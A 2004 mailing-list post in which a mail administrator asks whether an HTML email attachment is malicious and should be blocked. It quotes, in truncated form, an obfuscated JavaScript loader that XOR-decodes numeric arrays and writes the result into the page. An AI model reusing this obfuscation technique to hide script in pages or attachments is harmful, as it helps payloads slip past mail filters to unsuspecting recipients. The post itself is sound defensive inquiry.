Possible virus in JavaScript attachment?

Jim Holland mailscanner at MANGO.ZW
Mon Mar 8 21:30:02 GMT 2004


I have come across a number of suspicious messages with subject line
"hi", body text "This message has an attach", and the attachment
"superscripted.html", which contains the following type of scripting:

<script language="JavaScript">
difficulties = new Array(115,
180,145,215,7,246,108,140,123,22,242,
. . .
231,65,65,159,150,180,80,101,27,27,
218);
bribed = new Array(79,
220,229,186,107,200,97,134,71,116,157,
. . .
80,73,78,111,124,5,90,139,104,129
);
Shelton = 1142;
rupee = 231;
var obelisk = "";
for(Winslow = 0; Winslow < Shelton; Winslow++)
  obelisk = obelisk + String.fromCharCode(difficulties[Winslow] ^
 bribed[Winslow % rupee]);
document.write(obelisk);
</script>

These are not being blocked by MailScanner/ClamAV.  I don't know any
JavaScript, but the above looks distinctly suspect.  Does anyone know what
it is all about/whether it is potentially harmful?  Does this indicate a
possible exploit that should be blocked?

We automatically quarantine any html attachments that contain scripting,
but this is just done by testing using a simple grep and has nothing to do
with MailScanner.  Are we just being paranoid?  I would prefer to have
this done by MailScanner for consistency.

Regards

Jim Holland
System Administrator
MANGO - Zimbabwe's non-profit e-mail service



More information about the MailScanner mailing list